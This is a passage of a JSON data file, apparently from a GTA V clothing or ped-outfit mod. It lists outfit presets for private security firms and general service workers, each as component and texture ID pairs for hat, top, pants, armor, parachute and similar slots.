+"Top": "19:3", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "87:2", +"Shoes": "36:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female Merryweather PMC-I", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:7", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "46:3", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "66:1", +"Pants": "91:2", +"Shoes": "37:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Merryweather PMC-II", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:7", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "19:2", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "88:1", +"Pants": "88:2", +"Shoes": "36:1", +"Accessories": "2:1", +"Armor": "7:2", +"Parachute": "49:1" + }, + { +"Name": "Male Infiltration Operative", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "118:1", +"Glasses": "26:2", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "53:1", +"Top": "221:22", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "32:3", +"Shoes": "26:1", +"Accessories": "111:1", +"Armor": "10:4", +"Parachute": "49:1" + }, + { +"Name": "Female Infiltrator Operative", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "117:1", +"Glasses": "28:2", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "53:1", +"Top": "231:23", +"UpperSkin": "19:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "31:3", +"Shoes": "26:1", +"Accessories": "82:1", +"Armor": "7:4", +"Parachute": "49:1" + }, + { +"Name": "Male Bobcat Security Class A", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "216:12", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "43:1", +"Pants": "49:3", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "66:24" + }, + { +"Name": "Male Bobcat Security Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "215:14", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "43:1", +"Pants": "49:3", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "66:24" + }, + { +"Name": "Male Bobcat Security Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:14", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "43:1", +"Pants": "49:3", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "66:24" + }, + { +"Name": "Male Bobcat Security Pullover", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:18", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "43:1", +"Pants": "49:3", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Armored Bobcat Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "215:5", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "21:1", +"Pants": "49:3", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "3:3", +"Parachute": "21:1" + }, + { +"Name": "Male Armored Bobcat Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:5", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "21:1", +"Pants": "49:3", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "3:3", +"Parachute": "21:1" + }, + { +"Name": "Male Armored Bobcat Pullover", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:19", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "21:1", +"Pants": "49:3", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "3:3", +"Parachute": "21:1" + }, + { +"Name": "Female Bobcat Class A", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "220:12", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "9:1", +"Pants": "35:1", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "66:24" + }, + { +"Name": "Female Bobcat Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "219:14", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "9:1", +"Pants": "35:1", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "66:24" + }, + { +"Name": "Female Bobcat Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:14", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "9:1", +"Pants": "35:1", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "66:24" + }, + { +"Name": "Female Bobcat Pullover", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:18", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "9:1", +"Pants": "35:1", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female Armored Bobcat Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "219:5", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "20:1", +"Pants": "4:13", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "3:3", +"Parachute": "21:1" + }, + { +"Name": "Female Armored Bobcat Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:5", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "20:1", +"Pants": "4:13", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "3:3", +"Parachute": "21:1" + }, + { +"Name": "Female Armored Bobcat Pullover", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:19", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "20:1", +"Pants": "4:13", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "3:3", +"Parachute": "21:1" + }, + { +"Name": "Male Securoserv Class A", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "216:4", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "40:1", +"Pants": "26:4", +"Shoes": "55:1", +"Accessories": "1:1", +"Armor": "14:1", +"Parachute": "76:1" + }, + { +"Name": "Male Securoserv Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "215:4", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "40:1", +"Pants": "26:4", +"Shoes": "55:1", +"Accessories": "1:1", +"Armor": "14:1", +"Parachute": "76:1" + }, + { +"Name": "Male Securoserv Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:4", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "40:1", +"Pants": "26:4", +"Shoes": "55:1", +"Accessories": "1:1", +"Armor": "14:1", +"Parachute": "76:1" + }, + { +"Name": "Male Securoserv Pullover", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:17", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "40:1", +"Pants": "26:4", +"Shoes": "55:1", +"Accessories": "1:1", +"Armor": "14:1", +"Parachute": "49:1" + }, + { +"Name": "Female Securoserv Class A", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "220:4", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "4:1", +"Pants": "42:4", +"Shoes": "56:1", +"Accessories": "1:1", +"Armor": "15:1", +"Parachute": "76:1" + }, + { +"Name": "Female Securoserv Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "219:4", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "4:1", +"Pants": "42:4", +"Shoes": "56:1", +"Accessories": "1:1", +"Armor": "15:1", +"Parachute": "76:1" + }, + { +"Name": "Female Securoserv Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:4", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "4:1", +"Pants": "42:4", +"Shoes": "56:1", +"Accessories": "1:1", +"Armor": "15:1", +"Parachute": "76:1" + }, + { +"Name": "Female Securoserv Pullover", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:17", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "4:1", +"Pants": "42:4", +"Shoes": "56:1", +"Accessories": "1:1", +"Armor": "15:1", +"Parachute": "49:1" + }, + { +"Name": "Male L&L Security Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "215:16", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "43:1", +"Pants": "87:3", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "66:23" + }, + { +"Name": "Male L&L Security Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:16", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "43:1", +"Pants": "87:3", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "66:23" + }, + { +"Name": "Male L&L Security Pullover", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:24", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "43:1", +"Pants": "87:3", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male L&L Armored Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "215:16", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "21:3", +"Pants": "11:1", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "3:5", +"Parachute": "66:23" + }, + { +"Name": "Male L&L Armored Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:16", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "21:3", +"Pants": "11:1", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "3:5", +"Parachute": "66:23" + }, + { +"Name": "Male L&L Armored Pullover", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:24", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "21:3", +"Pants": "11:1", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "3:5", +"Parachute": "66:23" + }, + { +"Name": "Female L&L Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "219:16", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "9:1", +"Pants": "90:3", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "66:23" + }, + { +"Name": "Female L&L Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:16", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "9:1", +"Pants": "90:3", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "66:23" + }, + { +"Name": "Female L&L Pullover", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:24", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "9:1", +"Pants": "90:3", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female Armored L&L Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "219:16", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "20:3", +"Pants": "90:3", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "3:5", +"Parachute": "21:1" + }, + { +"Name": "Female Armored L&L Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:16", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "20:3", +"Pants": "90:3", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "3:5", +"Parachute": "21:1" + }, + { +"Name": "Female Armored L&L Pullover", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:24", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "20:3", +"Pants": "90:3", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "3:5", +"Parachute": "21:1" + }, + { +"Name": "Male Chuff Security Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "215:15", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "43:1", +"Pants": "49:4", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "66:25" + }, + { +"Name": "Male Chuff Security Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:15", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "43:1", +"Pants": "49:4", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "66:25" + }, + { +"Name": "Male Chuff Security Pullover", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:23", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "43:1", +"Pants": "49:4", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male Chuff Armored Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "215:15", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "21:2", +"Pants": "49:4", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "3:4", +"Parachute": "21:1" + }, + { +"Name": "Male Chuff Armored Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:15", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "21:2", +"Pants": "49:4", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "3:4", +"Parachute": "21:1" + }, + { +"Name": "Male Chuff Armored Pullover", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:23", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "21:2", +"Pants": "49:4", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "3:4", +"Parachute": "21:1" + }, + { +"Name": "Female Chuff Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "219:15", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "9:1", +"Pants": "4:12", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "66:25" + }, + { +"Name": "Female Chuff Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:15", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "9:1", +"Pants": "4:12", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "66:25" + }, + { +"Name": "Female Chuff Pullover", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:23", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "9:1", +"Pants": "4:12", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female Armored Chuff Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "219:15", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "20:2", +"Pants": "4:12", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "3:4", +"Parachute": "21:1" + }, + { +"Name": "Female Armored Chuff Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:15", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "20:2", +"Pants": "4:12", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "3:4", +"Parachute": "21:1" + }, + { +"Name": "Female Armored Chuff Pullover", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:23", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "20:2", +"Pants": "4:12", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "3:4", +"Parachute": "21:1" + }, + { +"Name": "Male Sanitation Coveralls", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "72:1", +"UpperSkin": "65:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "54:1", +"Shoes": "28:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "91:1" + }, + { +"Name": "Female Sanitation Coveralls", +"Gender": "Female", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "14:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "68:1", +"UpperSkin": "76:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "56:1", +"Shoes": "27:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "91:1" + }, + { +"Name": "Male Waste Collector", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "57:1", +"UpperSkin": "64:1", +"Decal": "1:1", +"UnderCoat": "60:2", +"Pants": "37:1", +"Shoes": "28:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Waste Collector", +"Gender": "Female", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "51:1", +"UpperSkin": "76:1", +"Decal": "1:1", +"UnderCoat": "37:1", +"Pants": "36:1", +"Shoes": "27:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Janitor", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "66:2", +"UpperSkin": "5:1", +"Decal": "67:3", +"UnderCoat": "156:1", +"Pants": "39:2", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Janitor", +"Gender": "Female", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "60:2", +"UpperSkin": "4:1", +"Decal": "77:3", +"UnderCoat": "192:1", +"Pants": "39:2", +"Shoes": "25:1", +"Accessories": "95:2", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Bugstars Overalls", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "140:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "176:1", +"Top": "66:1", +"UpperSkin": "5:1", +"Decal": "67:1", +"UnderCoat": "16:1", +"Pants": "39:1", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Mechanic Coveralls", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "67:2", +"UpperSkin": "89:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "40:2", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Highway Clearance", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "77:20", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "67:4", +"UpperSkin": "100:8", +"Decal": "68:6", +"UnderCoat": "16:1", +"Pants": "40:4", +"Shoes": "28:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Towing Technician", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "78:7", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "67:3", +"UpperSkin": "100:7", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "40:3", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "92:3" + }, + { +"Name": "Female Mechanic Coveralls", +"Gender": "Female", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "61:2", +"UpperSkin": "102:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "40:2", +"Shoes": "27:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Highway Clearance", +"Gender": "Female", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "61:4", +"UpperSkin": "118:8", +"Decal": "77:6", +"UnderCoat": "15:1", +"Pants": "40:4", +"Shoes": "27:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Towing Technician", +"Gender": "Female", +"Category": "SUP", +"Category2": "General Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "61:3", +"UpperSkin": "191:20", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "40:3", +"Shoes": "27:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "92:3" + }, + { +"Name": "Male Private Contractor", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "26:1", +"Glasses": "22:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "57:1", +"UpperSkin": "64:1", +"Decal": "1:1", +"UnderCoat": "90:1", +"Pants": "1:11", +"Shoes": "13:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "90:1" + }, + { +"Name": "Female Private Contractor", +"Gender": "Female", +"Category": "SUP", +"Category2": "General Services", +"Hat": "54:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "50:1", +"UpperSkin": "73:1", +"Decal": "1:1", +"UnderCoat": "57:1", +"Pants": "5:2", +"Shoes": "27:1", +"Accessories": "1:1", +"Armor": "20:7", +"Parachute": "49:1" + }, + { +"Name": "Male Public Worker", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "61:2", +"Glasses": "16:10", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "3:6", +"UpperSkin": "64:1", +"Decal": "1:1", +"UnderCoat": "91:1", +"Pants": "87:7", +"Shoes": "52:4", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "90:2" + }, + { +"Name": "Female Public Worker", +"Gender": "Female", +"Category": "SUP", +"Category2": "General Services", +"Hat": "61:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "74:1", +"UpperSkin": "84:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "5:2", +"Shoes": "27:1", +"Accessories": "1:1", +"Armor": "20:6", +"Parachute": "49:1" + }, + { +"Name": "Male Dockworker Coveralls", +"Gender": "Male", +"Category": "SUP", +"Category2": "General Services", +"Hat": "61:9", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "365:1", +"UpperSkin": "196:1", +"Decal": "1:1", +"UnderCoat": "183:1", +"Pants": "136:1", +"Shoes": "28:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Dockworker Coveralls", +"Gender": "Female", +"Category": "SUP", +"Category2": "General Services", +"Hat": "61:9", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": 